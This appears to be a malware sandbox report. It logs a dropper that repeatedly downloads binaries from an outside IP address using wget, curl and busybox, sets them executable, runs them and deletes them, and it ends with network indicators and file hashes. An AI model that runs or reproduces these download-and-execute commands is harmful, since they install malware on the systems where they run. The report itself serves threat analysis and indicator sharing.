[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97